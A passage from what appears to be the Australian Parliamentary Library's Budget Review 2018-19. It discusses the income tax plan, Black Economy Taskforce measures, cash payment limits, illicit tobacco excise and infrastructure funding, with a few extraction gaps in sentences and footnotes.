⢠individuals earning between $37,000 and $41,000 will have the new LITO amount reduced by 6.5 cents in the dollar for each dollar of income above $37,000 until their income reaches $41,000
⢠individuals earning over $41,000 will have their LITO amount reduced further by 1.5 cents in the dollar until it phases out entirely for individuals earning more than $66,667.
There are no further proposed changes to these tax offsets in the third step commencing from the 2024-25 income year.
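The two-stage taper of the new LITO can be sketched the same way (illustrative only, using the rates described above; the function name is invented for illustration):

```python
def new_lito(income):
    """LITO from 2022-23: $645 maximum, tapering in two stages."""
    offset = 645.0
    if income > 37000:
        offset -= 0.065 * (min(income, 41000) - 37000)  # 6.5c taper to $385 at $41,000
    if income > 41000:
        offset -= 0.015 * (income - 41000)              # 1.5c taper, gone at $66,667
    return max(0.0, offset)

for income in (37000, 41000, 50000, 66667):
    print(income, round(new_lito(income), 2))
# -> 645.0, 385.0, 250.0 and 0.0 respectively
```

The kink at $41,000 (from 6.5 cents down to 1.5 cents) is what keeps the phase-out endpoint at the same $66,667 as the current LITO, as shown in Figure 3.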
Figure 3: Maximum LITO amount from 2022-23 onwards
Source: Parliamentary Library analysis based on Treasury Laws Amendment (Personal Income Tax Plan) Bill 2018.
Tax thresholds The PITP also makes changes to income tax thresholds in three steps in 2018-19, 2022-23 and 2024-25. These changes predominately affect middle and high income earners.
⢠in the 2018-19 income year the threshold for the 32.5 per cent marginal tax rate will increase from $87,000 to $90,000146
⢠in the 2022-23 income year the threshold for the 32.5 per cent marginal tax rate will increase from $90,000 to $120,000147
⢠the final change in 2024-25 income year will abolish the 37 per cent tax bracket entirely and extend the marginal tax rate of 32.5 per cent to all taxable incomes between $40,001 and $200,000.148
145. Treasury Laws Amendment (Personal Income Tax Plan) Bill 2018, p. 7. 146. Ibid., p. 13. 147. Ibid., pp. 13-14. 148. Ibid., p. 14.
As changes in income tax thresholds will change the amount that the ATO withholds from individuals’ income, these tax cuts will effectively be provided throughout the year instead of on assessment (as with tax offsets).
The new proposed income tax schedules under each step (as estimated by the Parliamentary Library) are included at Attachment A.
Financial Impact According to the 2018-19 Budget Papers the proposed PITP is estimated to reduce revenue by $13.4 billion over the Budget forward estimates period.149 However, the forward estimates period does not include the changes scheduled to commence in 2022-23 and 2024-25. The Government has confirmed that the estimated cost of the proposal over 10 years will be $140 billion but has stated a year by year estimate of this figure would be unreliable.150
Legislation The Treasury Laws Amendment (Personal Income Tax Plan) Bill 2018 (the Bill), which seeks to implement all elements of the Government’s PITP, was introduced into the House of Representatives on 9 May 2018. The Treasurer has confirmed that the Government will seek to legislate all elements of the PITP in the same Bill.151 This is despite reported calls from the Opposition and other cross-bench senators to consider each set of changes separately.152
ALP position The Australian Labor Party (ALP) has announced that it will support the introduction of the PITP changes that commence in 2018-19; namely the introduction of the LAMITO and the increase in the 32.5 per cent tax rate threshold to $90,000.153
The ALP has also announced that from the 2019-20 income year they would provide a permanent tax offset with a maximum amount of $928 per year for individuals with taxable income less than $125,000, $398 more than the maximum amount of LAMITO.154
Not proceeding with the increase in the Medicare Levy In the 2018-19 Budget the Government announced that it would no longer proceed with its plan (announced in the 2017-18 Budget)155 to increase the Medicare levy. This is expected to reduce Government revenue by $12.8 billion over the forward estimates period. In a speech to Australian Business Economists on 26 April 2018 the Treasurer stated that the increase in the Medicare levy was no longer needed as a result of the better fiscal position outlined in the Budget.156 The Government has indicated that it intends to fully fund the NDIS by ‘continuing to deliver a stronger economy and by ensuring the Government lives within its means.’157 The ALP has also stated that it would not proceed with its proposal to increase the Medicare levy for individuals with taxable income greater than $87,000.
149. Australian Government, Budget measures: budget paper no. 2: 2018-19, pp. 33-34.
150. S Morrison (Treasurer), Interview with Barrie Cassidy, ABC Insiders, transcript, 13 May 2018.
151. Ibid.
152. AAP, ‘Pressure on coalition to split tax plan’, SBS News, 11 May 2018.
153. B Shorten (Leader of the Opposition) and Chris Bowen (Shadow Treasurer), Tax Refund For Working Australians - Bigger, Better & Fairer, media release, 10 May 2018.
154. Ibid.
155. Australian Government, Budget measures: budget paper no. 2: 2017-18, pp. 24-25.
156. S Morrison (Treasurer), ‘Lower taxes for a stronger economy: address to the Australian Business Economists’, Sydney, 26 April 2018.
157. Ibid.
Attachment A: Proposed personal income tax rates for resident individuals under the PITP158 Table 1: Personal income tax rates applying in the 2017-18 income year
Taxable income Tax on this taxable income
$0 - $18,200 Nil
$18,201 - $37,000 19 cents for each $1 over $18,200
$37,001 - $87,000 $3,572 plus 32.5 cents for each $1 over $37,000
$87,001 - $180,000 $19,822 plus 37 cents for each $1 over $87,000
$180,001 and over $54,232 plus 45 cents for each $1 over $180,000
Source: ATO website.
Table 2: Personal income tax rates applying in the 2018-19, 2019-20, 2020-21 and 2021-22 income years
Taxable income Tax on this taxable income
$0 - $18,200 Nil
$18,201 - $37,000 19 cents for each $1 over $18,200
$37,001 - $90,000(a) $3,572 plus 32.5 cents for each $1 over $37,000
$90,001(a) - $180,000 $20,797 plus 37 cents for each $1 over $90,000
$180,001 and over $54,097 plus 45 cents for each $1 over $180,000
(a) $87,000 threshold raised to $90,000 from 2018-19 income year
Source: Parliamentary Library analysis based on Treasury Laws Amendment (Personal Income Tax Plan) Bill 2018 and explanatory memorandum.
Table 3: Personal income tax rates applying in the 2022-23 and 2023-24 income years
Taxable income Tax on this income
$0 - $18,200 Nil
$18,201 - $41,000(a) 19 cents for each $1 over $18,200
$41,001(a) - $120,000(b) $4,332 plus 32.5 cents for each $1 over $41,000
$120,001(b) - $180,000 $30,007 plus 37 cents for each $1 over $120,000
$180,001 and over $52,207 plus 45 cents for each $1 over $180,000
(a) $37,000 income threshold raised to $41,000 from 2022-23 income year
(b) $90,000 income threshold raised to $120,000 from 2022-23 income year
Source: Parliamentary Library analysis based on Treasury Laws Amendment (Personal Income Tax Plan) Bill 2018 and explanatory memorandum.
158. The following tables do not include the impact of the Medicare levy.
Table 4: Personal income tax rates applying from the 2024-25 income onwards
Taxable income Tax on this income
$0 - $18,200 Nil
$18,201 - $41,000 19 cents for each $1 over $18,200
$41,001 - $200,000(a) $4,332 plus 32.5 cents for each $1 over $41,000
$200,001 and over $56,007 plus 45 cents for each $1 over $200,000
(a) 37 cents in the dollar tier abolished and 32.5 cents in the dollar threshold raised to $200,000.
Source: Parliamentary Library analysis based on Treasury Laws Amendment (Personal Income Tax Plan) Bill 2018 and explanatory memorandum.
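The cumulative base amounts in Tables 1 to 4 (for example $4,332 and $56,007 in Table 4) follow mechanically from the bracket boundaries. The sketch below re-derives them as a consistency check; it is illustrative only and, like the tables, excludes the Medicare levy.

```python
def base_amounts(brackets):
    """Tax accrued at each bracket's lower threshold, given
    [(threshold, marginal_rate), ...] sorted by threshold."""
    bases = []
    accrued = 0.0
    for i, (threshold, rate) in enumerate(brackets):
        bases.append((threshold, round(accrued)))
        if i + 1 < len(brackets):
            accrued += (brackets[i + 1][0] - threshold) * rate
    return bases

# 2024-25 schedule from Table 4 (Medicare levy excluded)
print(base_amounts([(18200, 0.19), (41000, 0.325), (200000, 0.45)]))
# -> [(18200, 0), (41000, 4332), (200000, 56007)]
```

The same helper reproduces the $3,572/$19,822/$54,232 column of Table 1 when given the 2017-18 thresholds.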
Targeting the black economy Joseph Ayoub
The Black Economy Taskforce The Black Economy Taskforce (the Taskforce) is chaired by Michael Andrew AO (the current Chair of the Board of Taxation) and was established in December 2016 to develop a multi-pronged policy response to combat the black economy in Australia.159
The Taskforce provided the Black Economy Taskforce: final report—October 2017 (Final Report) to the Government in October 2017, which was publicly released with this year’s budget.160 The release was also accompanied by the Government’s response Tackling the Black Economy: Government Response to the Black Economy Taskforce Final Report (Government Response).161 The Final Report contains 80 recommendations which span the whole economy.162
What is the black economy? There is no internationally agreed definition of the black economy and definitions vary within Australia. According to the Taskforce it generally covers activities which take place outside the tax and regulatory systems involving both legal and illegal activities.163 Examples of black economy activity are listed in the adjacent box.164
What is the size of the black economy? In 2012, the Australian Bureau of Statistics (ABS) estimated that ‘underground production’ or the ‘cash economy’ accounted for 1.5% of Australia’s Gross Domestic Product (GDP).165 According to the Taskforce, this amounted to approximately $25 billion. Earlier this year KPMG estimated that the total, annual, aggregate tax gap including losses to Pay As You Go (PAYG) income tax, GST and self-assessed personal income tax to be $5.8 billion.166
159. The Treasury, ‘Black Economy Taskforce’, The Treasury website.
160. Black Economy Taskforce (Taskforce), Black Economy Taskforce: final report-October 2017, The Treasury, Canberra, October 2017.
161. Australian Government, Tackling the black economy: government response to the Black Economy Taskforce final report, The Treasury, May 2018.
162. Ibid., p. 1; Taskforce, Black Economy Taskforce: final report-October 2017, op. cit., pp. vii-xi.
163. Taskforce, Black Economy Taskforce: final report-October 2017, op. cit., p. 12.
164. Ibid., pp. 12-18.
165. Australian Bureau of Statistics (ABS), The non-observed economy and Australia’s GDP, 2012: information paper, cat. no. 5204.0.55.008, ABS, Canberra, 12 September 2013.
166. KPMG, The last frontier: shining a light on the black economy, KPMG, March 2018, p. 2.
Examples of black economy activities
⢠Not reporting or under-reporting income
⢠Paying for work cash-in-hand
⢠Underpayment of wages
⢠Sham contracting
⢠Phoenixing — when a new company is created to continue the business of a company that has been deliberately liquidated to avoid paying its debts
⢠Bypassing visa restrictions and visa fraud
⢠Identity fraud
⢠Australian Business Number (ABN) fraud
⢠GST fraud
⢠Origin of goods and duty fraud
⢠Duty evasion and illicit tobacco
⢠Tobacco excise evasion
⢠Money laundering
⢠Unregulated gambling
⢠Illegal and criminal activities
In its Final Report the Taskforce stated that the black economy is larger than estimated by the ABS in 2012 and could be as large as 3% of GDP—in 2015-16 this equated to $50 billion.167 It is also likely that certain elements of the black economy are continuing to grow as a result of a combination of ‘strong incentives, poor transparency and limited enforcement’.168 Figure 1 shows the Taskforce’s estimation of the breakdown of black economy activity.
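Taken at face value, the two estimates are mutually consistent: $25 billion at 1.5 per cent of GDP and $50 billion at 3 per cent of GDP both imply a nominal GDP base of roughly $1.67 trillion. The arithmetic is sketched below (illustrative only; the GDP figure is implied from the stated shares, not separately sourced).

```python
# Cross-check of the two black economy size estimates (figures from the text).
abs_estimate = 25e9        # ABS: 'underground production' ~ $25 billion
abs_share = 0.015          # ... stated as 1.5% of GDP
taskforce_estimate = 50e9  # Taskforce: ~ $50 billion in 2015-16
taskforce_share = 0.03     # ... stated as 3% of GDP

implied_gdp_abs = abs_estimate / abs_share
implied_gdp_taskforce = taskforce_estimate / taskforce_share
print(round(implied_gdp_abs / 1e12, 2), round(implied_gdp_taskforce / 1e12, 2))
# -> 1.67 1.67 (both imply the same ~$1.67 trillion GDP base)
```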
Figure 1: Partial indicators of black economy related activity (citations excluded)169
International experience In its Black Economy Taskforce: interim report-March 2017 to Government, the Taskforce estimated that Australia’s black economy may be at the lower end of the range, close to the UK and Canada.170 However, this was based on the ABS 2012 data noted above, which estimated that ‘underground production’ accounted for 1.5% of Australia’s GDP, and on data collected by the Organisation for Economic Co-operation and Development (OECD) on the black economy in various countries (excluding Australia).
Based on the latest available OECD data and the Taskforce’s revised estimate of the black economy, the Parliamentary Library has produced Figure 2 which is an estimate of the size of Australia’s black economy compared to other OECD countries for 2015-16.
167. Taskforce, Black Economy Taskforce: final report-October 2017, op. cit., p. 35. 168. Ibid. 169. Ibid., p. 36. The taskforce notes that the figures presented are not additive and should be taken as indicative only. 170. Taskforce, Black Economy Taskforce: interim report-March 2017, op. cit., p. 14.
Figure 2: OECD comparison of Australia’s black economy
Note: this comparison is based on a 2011-12 survey by the OECD of participating countries. Australia was not included in the survey. The 2012 figure for Australia is based on the 2012 estimate by the ABS. This estimate was provided by the Taskforce in its Interim Report. The 2015-16 figure for Australia is based on the Taskforce’s estimate in its Final Report. Figure 2 should be interpreted with significant caution.
Source: OECD and ABS statistics 171
What drives the black economy? The Taskforce found that there are a range of drivers that interact with one another and ultimately lead to the decision to participate in the black economy.172 These drivers range from high tax and regulatory burdens through to changing business and technological landscapes. Other examples of drivers include:
⢠economic conditions and commercial pressures
⢠social norms which legitimise participation in the black economy
⢠availability, use and cost of cash
⢠inadequate knowledge about the system. 173
171. Estimates based on: OECD, The Non-Observed Economy in the System of National Accounts, OECD Statistics Brief, no. 18, 2014; Australian Bureau of Statistics (ABS), The non-observed economy and Australia’s GDP, 2012: information paper, op. cit.; Taskforce, Black Economy Taskforce: final report-October 2017, op. cit., p. 35.
172. Taskforce, Black Economy Taskforce: interim report-March 2017, op. cit., pp. 15-20.
173. Ibid.
The Taskforce found that drivers can ‘offset or counter-balance each other’ and can either work to dissuade or encourage black economy participation.174 However, where the drivers encourage participation in the black economy, the Taskforce has observed the emergence of a ‘disturbing pattern’ in areas of public policy as outlined in the adjacent box.175
What are the consequences? Participation in the black economy produces both direct and indirect costs.176 The most immediate and obvious direct cost is the loss of taxation revenue and abuse of the welfare system — underreporting income enables a person to claim a benefit that they would otherwise not be entitled to. However, there are also a range of indirect costs including:
⢠harm suffered by individuals who are not within the relevant regulatory systems (such as workplace relations, immigration, occupational health and safety) because they are, for example, ‘off the books’
⢠by offering goods and services below the market value because, for example, payment is made in cash, the tax and regulatory costs are avoided. This provides the individual or business with a competitive advantage which penalises businesses and individuals who comply with their obligations
⢠if the community has a perception that the system is unfair or they lack confidence in the administration of system, this may result in their own participation in the black economy.177
The Taskforce considered that it is not realistic or cost effective to try to limit the costs entirely because ‘a number of black economy initiatives stem from basic design features of our tax and other systems’. An example given is the ‘tightly means-tested transfer systems’.178 However, ‘well-designed measures to counter the black economy can be expected to yield meaningful budgetary dividends over time’.179
Government response The Government has already begun to implement measures that arose out of recommendations in the Taskforce’s Interim Report - for example, the Treasury Laws Amendment (Black Economy Taskforce Measures No. 1) Bill 2018 criminalises the production, supply, use or possession of sales suppression technology and also extends the taxable payments reporting system to cleaning and courier businesses that have an ABN. The Fair Work Amendment (Protecting Vulnerable Workers) Bill 2017, among other things, introduced higher penalties for contravention of workplace laws.
Many of the Taskforce’s 80 recommendations addressed by the Government in its Response will be considered in the context of the Government’s existing policy review or processes.180 That said,
174. Ibid., p. 19.
175. Ibid., pp. 18-19.
176. Ibid., p. 37.
177. Ibid., pp. 37-38; Taskforce, Black Economy Taskforce: interim report-March 2017, op. cit., pp. 1, 11.
178. Taskforce, Black Economy Taskforce: final report-October 2017, op. cit., p. 37.
179. Ibid.
180. Australian Government, Tackling the black economy: government response to the Black Economy Taskforce final report, op. cit., p. 14.
Development of black economy activity
Phase 1: there is an inherited policy, regulatory, and enforcement architecture which does not keep pace with economic, social or technological change.
Phase 2: some people exploit the regulatory gaps which have failed to keep pace with the above changes — when others see them ‘getting away with it’ they also move into the black economy.
the Government has expressed agreement or agreement in principle, with a number of measures. The measures that the Government disagreed with include:
⢠Recommendation 7.3—offer a time-limited amnesty for small businesses followed by an ‘enforcement blitz’.181
⢠Recommendation 10.2—change the alienation of personal services income rules and strengthen enforcement.182 Alienation of personal services income occurs when the services of an individual are provided through an interposed entity such as a company, trust or partnership, the profits of which are retained by that entity or diverted to associates in order to take advantage of a lower tax rate. It can also involve structuring in a particular way in order to take advantage of deductions which wouldn’t be available to an individual providing the same services as an employee.183
⢠Recommendation 13.3—examine the feasibility of introducing technology which marks cigarette packs and cases to show when excise has been correctly paid.184
Consistent with the Final Report, the Government acknowledges that it will need to address the root causes and drivers, while the current focus must be on the most urgent and costly problems.185
2018-19 Budget announcements The 2018-19 Budget builds on these measures and implements some of the Taskforce’s recommendations contained in the Final Report, including:
⢠an economy-wide limit of $10,000 for cash payments made to businesses for goods and services from 1 July 2019. (see separate Parliamentary Library brief: Black economy measures: limits on cash payments)
⢠a range of measures aimed at combatting the sale and production of illicit tobacco and to improve the collection of excise and customs duty on tobacco (see Parliamentary Library brief: Tobacco)
⢠expansion of the Taxable Payment Reporting System (TPRS) to:
- security providers and investigation services
- road freight transport
- computer system design and related services
⢠providing Treasury with $12.3 million over five years (with $1.7 million in 2022-23) to manage a whole of Government response to the Taskforce’s Final Report
⢠providing the ATO with $3.4 million over four years to lead a multi-agency Black Economy Standing Taskforce (the BEST). (see separate Parliamentary Library brief: Black economy standing taskforce)
⢠providing $318.5 million over four years to implement strategies including:
- establishing ATO ‘mobile strike teams’ and increasing the ATO ‘audit presence’
- establishing a black economy hotline which the public can use to report black economy activity including phoenix activities
181. Ibid., p. 20.
182. Ibid., p. 26.
183. Australian Taxation Office (ATO), ‘General anti-avoidance rules and PSI’, ATO website, last modified 30 March 2017.
184. Australian Government, Tackling the black economy: government response to the Black Economy Taskforce final report, op. cit., p. 35.
185. Ibid., p. 14.
⢠providing the ATO with $9.2 million to develop a ‘Procurement Connected Policy’, initially requiring businesses seeking to tender for Australian Government procurement contracts over $4 million to provide a statement from the ATO that they are tax compliant
⢠removing certain deductions for those taxpayers who fail to comply with their Pay As You Go (PAYG) withholding obligations
⢠designing a new regulatory framework for the Australian Business Numbers (ABN) system
⢠a range of measures aimed at combating illegal phoenixing.
Financial impact The above measures include both revenue and expense measures. Figure 3 shows the total cost of the black economy and related measures announced in the 2018-19 Budget over the forward estimates. Based on the figures available in Budget Paper No. 2, it appears that the measures will produce a net gain of $4.6 billion over the forward estimates. This includes the measure to bring forward the payment of excise on all warehoused tobacco to 2019-20, and measures to combat illicit tobacco, which together are worth about $3.6 billion (see Parliamentary Library brief: Tobacco). When this measure is excluded the net gain is reduced to about $950 million over the forward estimates.186
Figure 3: total cost of 2018-19 Budget black economy and related measures
Source: Budget measures: budget paper no. 2: 2018-19
186. Australian Government, Budget measures: budget paper no.2: 2018-19, pp. 1-6, 47-68 and 194-199.
Black Economy Standing Taskforce Joseph Ayoub
As discussed in the Parliamentary Library brief: Targeting the black economy, the Final Report of the Black Economy Taskforce (the Taskforce) made 80 recommendations to Government.187 Black Economy Package—new and enhanced ATO enforcement against the Black Economy188 and Black Economy Taskforce—Standing Taskforce189 implement recommendations 8.1 and 16.2 of the Taskforce—namely that the Government:
⢠implement a multi-pronged strategy to increase the level and visibility of enforcement and prosecutions, covering tax, industrial relations, welfare, immigration and financial regulatory compliance. The strategy needs to make better use of intelligence and be focused on problem areas.190
⢠establish a standing taskforce to identify, respond to and prosecute serious, complex black economy fraud.191
The Australian Taxation Office’s (ATO) current funding for compliance and audit activities for black economy activities is due to expire on 30 June 2018.192 The Government will provide the ATO with $3.5 million over four years from 2018-19 to lead a multi-agency Black Economy Standing Taskforce (BEST).193 This strategy is supported by the Government’s announcement that it will provide the ATO with an additional $318.5 million over four years from 2018-19 ‘to implement new strategies to combat the black economy’.194 According to the Budget announcement, this will involve establishing ‘mobile strike teams’ and increasing the ATO’s audit presence.195 This is part of the Government’s plan to ‘deliver more targeted, stronger and more visible enforcement’.196
According to the Taskforce, there is a community perception that it is currently ‘too easy to get away with’ participating in the black economy.197 The Final Report notes that businesses and individuals in regional areas may ‘not think that they will be subject to enforcement proceedings because they do not see a visible presence by major regulators in the area’.198 The Taskforce considered that increased publicity and presence can help change this perception.199
The Taskforce envisaged that the BEST would be modelled on the Serious Financial Crimes Taskforce and deal with serious, complex and high-value cases which require a cross-agency approach.200 Criminal behaviour in labour hire operations and pockets of entrenched labour exploitation are examples provided by the Taskforce.201 While it is not clear from the Budget announcement which agencies the ATO will be working with, the Taskforce noted that the ATO would work with the Australian Federal Police, the Australian Criminal Intelligence Commission, as
187. Black Economy Taskforce (Taskforce), Black Economy Taskforce: final report-October 2017, The Treasury, Canberra, October 2017, pp. vii-xi.
188. Australian Government, Budget measures: budget paper no.2: 2018-19, p. 23.
189. Ibid., p. 181.
190. Taskforce, Black Economy Taskforce: final report-October 2017, op. cit., pp. 181-5.
191. Ibid., p. 337.
192. Australian Government, Budget measures: budget paper no.2: 2018-19, p. 24.
193. Ibid., p. 181.
194. Ibid., p. 23.
195. Australian Government, Tackling the black economy: government response to the Black Economy Taskforce final report, The Treasury, May 2018, p. 10.
196. Ibid.
197. Taskforce, Black Economy Taskforce: final report-October 2017, op. cit., p. 184.
198. Ibid., p. 178.
199. Ibid., p. 184.
200. Ibid., p. 338.
201. Ibid., p. 337.
well as relevant policy and regulatory agencies such as the Department of Home Affairs and the Fair Work Ombudsman.202
In recent times, the ATO has led and participated in a number of taskforces, including:
• Tax Avoidance Taskforce—which scrutinises the tax affairs of multinational enterprises, large public and private groups and wealthy individuals operating in Australia
• Phoenix Taskforce—a whole-of-government approach to combatting illegal phoenix activity, and
• Serious Financial Crimes Taskforce—a multi-agency taskforce targeting serious financial crime in Australia, which developed out of Project Wickenby.203

.204 The Commissioner of Taxation responded to the first of the Cash Economy Task Force’s (CETF) reports, Improving tax compliance in the cash economy, by increasing the ATO’s staff presence in cash industries and developing Task Force initiatives.205 In its second report, also titled Improving tax compliance in the cash economy, the CETF found that there was ‘widespread acceptance in the community that not paying tax on cash income is OK’.206 The ATO also implemented an inter-agency cooperation program involving the Department of Social Services (Centrelink), the Department of Immigration and Multicultural Affairs, and the Department of Employment, Education, Training and Youth Affairs to facilitate joint case work and improve understanding of compliance activities.207
The Taskforce also noted that the Government will need to maintain a sustained focus on the implementation of the Final Report, something which in the Taskforce’s opinion has not happened with earlier black economy reviews.208 In this respect, the Government has also provided $12.3 million to Treasury over five years to ‘manage implementation of the whole-of-government response’ to the Final Report.209
As part of the Government’s response, a ‘Black Economy Hotline’ will be established.210 While suspicion of tax evasion can currently be reported both online and over the telephone,211 the Government considers that this hotline will allow the community to better report black economy and phoenix activity.212 Further, the hotline will be supported by new IT infrastructure so that information provided by the community can be converted into metadata to facilitate enforcement action.213 This appears to be consistent with the Taskforce’s statement that there is a need to
202. Ibid.
203. For further information, see Parliamentary Library brief: Tax integrity package—establishing the tax avoidance taskforce from the Parliamentary Library’s Budget review 2016-17.
204. B Pulle, ‘Budgeted Tax Revenue, the Cash (or Black or Underground) Economy and the Tax Gap’, Budget Review 1998-99, Parliamentary Library, Canberra, May 1998, p. 50.
205. Ibid.
206. Ibid.
207. Cash Economy Task Force, Improving tax compliance in the cash economy, Australian Taxation Office, Canberra, 1998, pp. 10-11.
208. Ibid., p. 335.
209. Australian Government, Budget measures: budget paper no.2: 2018-19, p. 180.
210. Ibid., pp. 23-4.
211. ATO, ‘Report fraud, tax evasion, a tax planning scheme or unpaid super’, ATO website, last updated 20 February 2018.
212. Australian Government, Budget measures: budget paper no.2: 2018-19, p. 24.
213. Ibid., p. 24.
devote resources towards enforcement activities in more ‘efficient and smarter ways by making better use of data and focussing on problem areas’.214’.215 The Government has accepted this recommendation.216
It is expected that Black Economy Package—new and enhanced ATO enforcement against the Black Economy will have a net gain to the budget of $2.4 billion in fiscal balance terms over the forward estimates.217
214. Taskforce, Black Economy Taskforce: final report-October 2017, op. cit., p. 177.
215. Ibid., p. 272.
216. Australian Government, Tackling the Black Economy: Government Response to the Black Economy Taskforce Final Report, op. cit., p. 29.
217. Australian Government, Budget measures: budget paper no.2: 2018-19, p. 23.
Black economy measures: limits on cash payments Joe Ayoub, Dr Jonathon Deans
As discussed in the Targeting the black economy article in Budget Review 2018-19, the final report of the Black Economy Taskforce (‘the Taskforce’) made 80 recommendations to the Government.218 Recommendation 3.1 of the final report was the adoption of a limit on cash payments for goods and services, which the Government accepted in its response, released on 8 May 2018.219
The recommendation has been included in the Budget as the Black Economy Package— introduction of an economy-wide cash payment limit measure.220.221
Prevalence of cash use
Research published by the Reserve Bank of Australia (RBA) in July 2017 showed that cash accounted for 18 per cent of total merchant transactions (by value), falling to 11 per cent for payments of $501 or more.222.223 Non-compliance with taxation obligations enabled by the use of cash also provides businesses with an unfair competitive advantage, as they are able to offer goods and services at a discount.224
Risks of cash use.225
218. Black Economy Taskforce, Black Economy Taskforce: final report, Commonwealth of Australia, October 2017.
219. Australian Government, Government response to the Black Economy Taskforce final report, 8 May 2018.
220. Australian Government, Budget measures: budget paper no. 2: 2018-19, 2018, p. 23.
221.).
222. Reserve Bank of Australia, How Australians pay: evidence from the 2016 Consumer Payments Survey, Supplementary Statistical Tables.
223. Black Economy Taskforce: final report, op. cit., p. 49.
224. Ibid., p. 53.
225. Ibid., p. 55.
A media report quoted the Minister for Revenue and Financial Services, Kelly O’Dwyer, as stating: ‘We’ve accepted $10,000 but we are interested in consultation around the figure as well’.227 The Taskforce’s final report noted that several countries in Europe have equivalent limits, including France, Italy, and Spain, and that the European Commission is exploring whether to adopt a limit across the European Union.228 A 2017 study by researchers at Harvard University and the Royal United Services Institute identified Jamaica, Mexico, Uruguay, and India as also having limits on cash transactions.229 That study found that limits ‘represent a practical and relatively low-risk policy tool to tackle’ money laundering and tax evasion, with ‘very limited downsides … in terms of the impact on legitimate economic activity’.230
A separate media report identified real estate, vehicle sales, and horticultural farming as industries which may be affected.
226. Ibid., pp. 56-57.
227. J Mather, ‘Government binned cash amnesty idea’, Australian Financial Review, 11 May 2018, p. 8.
228. Black Economy Taskforce: final report, op. cit., p. 55.
229.
230. Ibid., p. 35.
Tobacco Ph.231.232
However, the tobacco-related measures that have a material impact on the Budget do not concern illicit tobacco per se, but concern changes in the timing of the collection of excise on legally imported tobacco.
Imposing duty on imported tobacco earlier in the supply chain.233
From 1 July 2019, customs duty will apply to tobacco products as soon they are imported, removing the ability of tobacco importers to defer taxation using warehousing arrangements.234 The Taskforce recommended this approach in order to minimise the opportunity for duty to be avoided by distributing tobacco from warehouses illicitly, prior to the imposition of tax.235
Taxing tobacco warehoused on 1 June 2019.
Other related measures The package includes several other measures:
• from 1 July 2018, creating a cross-agency Illicit Tobacco Task Force (ITTF) to allow for enhanced cooperation in tackling illicit tobacco trade and prosecuting organised crime groups. The new Task Force, which builds on the approach of the Australian Border Force Tobacco Strike Team, will have additional powers and capabilities to enhance intelligence gathering and proactively target, disrupt and prosecute serious and organised crime groups at the centre of the illicit tobacco trade.236
231. Australian Government, Budget measures: budget paper no. 2: 2018-19, p. 12; Australian Government, Black Economy Taskforce: Final report, Treasury, October 2017.
232. Ibid., p. 30.
233. Department of Home Affairs (Home Affairs), ‘Warehouses and depots’, Home Affairs website.
234. For explanatory material, see Australian Taxation Office (ATO), ‘Excise equivalent goods (imports)’, ATO website.
235. Australian Government, Black Economy Taskforce: Final report, op. cit., p. 311.
236. Australian Government, Budget measures: budget paper no. 2: 2018-19, p. 12.
- The existing Black Economy Taskforce recommended that the ITTF comprise the Australian Taxation Office, Australian Federal Police, Department of Home Affairs, the Australian Criminal Intelligence Commission and the Department of Health.237
• providing additional resources to the ATO to detect and destroy domestically grown illicit tobacco crops
• making manufactured tobacco products a restricted import from 1 July 2019, requiring a permit from the Department of Home Affairs to import them, and
• upgrading the ATO’s payment systems infrastructure for customs duties.
These policies will complement the previously announced measures to combat illicit tobacco.238.
Financial impact:
• Applying customs duties to tobacco products already stored within warehouses. This has the effect of bringing forward tobacco tax revenue that would have otherwise been paid in future years. This component is expected to have a one-off financial impact in 2019-20.
• Additional revenue from reducing tax avoidance through the illicit trade in tobacco. This component is expected to have an ongoing financial impact.
Table 1: Financial impact of the ‘Black Economy Package - combatting illicit tobacco’
237. Ibid., p. 309.
238. For example, see Australian Government, Budget measures: budget paper no. 2: 2016-17, p. 16; ‘Tobacco Excise — measures to improve health outcomes and combat illicit tobacco’.
Infrastructure expenditure Ad’.239 Budget Paper No. 1 clarifies that this figure accounts for the period from 2018-19 until 2027-28.240 This announcement builds on statements made in the 2017-18 Budget in which the Treasurer stated the Government had increased total funding and financing to transportation infrastructure to $70 billion over the years 2013-14 to 2020-21241 and projected the delivery of $75 billion in infrastructure funding and financing from 2017-18 to 2026-27.242
The Government states that of the $75 billion package in 2018-19, $24.5 billion is to be funded in 2018-19.243 This was clarified by ‘Treasury and Infrastructure department officials’ as being $4.2 billion on new projects and $17.8 billion to fund existing projects between 2018-19 and 2021-22.244.’245 Also, Infrastructure Partnerships Australia (IPA) said ‘Tonight’s Federal Budget sees infrastructure funding reduced by $2 billion over the forward estimates, meaning less cash for projects and more congestion for commuters’.246 Similar issues were raised in relation to the claims made in the 2017-18 Budget with the Opposition spokesperson questioning the total and claiming that spending was declining.247
This brief outlines some of the funding mechanisms for infrastructure, in particular payments to the states and the use of new funding mechanisms, and the challenges that hinder reconciliation of the different claims on infrastructure spending.
Payments to the states and territories.248
These payments are summarised annually in Budget Paper No. 3, Federal Financial Relations. The federal financial relations document also summarises untied local road payments to local governments.
239. Australian Government, Budget speech 2018-19.
240. Australian Government, Budget strategy and outlook: budget paper no.1: 2018-19, Statement 1, p. 1-18.
241. Australian Government, Budget strategy and outlook: budget paper no.1: 2017-18, Statement 1, p. 1-1.
242. Ibid., p. 1-11.
243. Australian Government, Budget strategy and outlook: budget paper no.1: 2018-19, Statement 1, p. 1-18.
244. P Karp, ‘Roads get $4.5bn in Australia budget but rail spending forced to wait’, The Guardian, 8 May 2018.
245. A Albanese (Shadow Minister for Infrastructure, Transport, Cities and Regional Development), Infrastructure con job laid bare in budget fine print, media release, 9 May 2018.
246. Infrastructure Partnerships Australia, Feds warm infrastructure narrative has not been met by cold hard cash, media release, May 2018.
247. A Albanese (Shadow Minister for Infrastructure, Transport, Cities and Regional Development), Turnbull avoids truth about his big cuts to infrastructure investment, 10 May 2017.
248. See, the Council on Federal Financial Relations,.
The payments to and through the states are dispersed based on certain programs, which for 2018-19 includes:
• The Infrastructure Investment Program: covering Black Spot Projects, the Bridges Renewal Program, Developing Northern Australia—including Improving Cattle Supply Chains and Northern Australia Roads, the Heavy Vehicle Safety and Productivity Program, the Major Projects Business Case Fund, the National Rail Program—including a rail and road component, Roads of Strategic Importance, Roads to Recovery and the Urban Congestion Initiative.
• The Infrastructure Growth Package: covering the Asset Recycling Initiative, ‘new investments’, Interstate Road Transport and the Western Sydney Infrastructure Plan.
• A range of other infrastructure, including for example the Launceston City Deal-Tamar River, Murray-Darling Basin Regional Economic Diversification Program, Supporting Drought-Affected Communities Program, Western Sydney City Deal and WiFi and Mobile Coverage on Trains..249
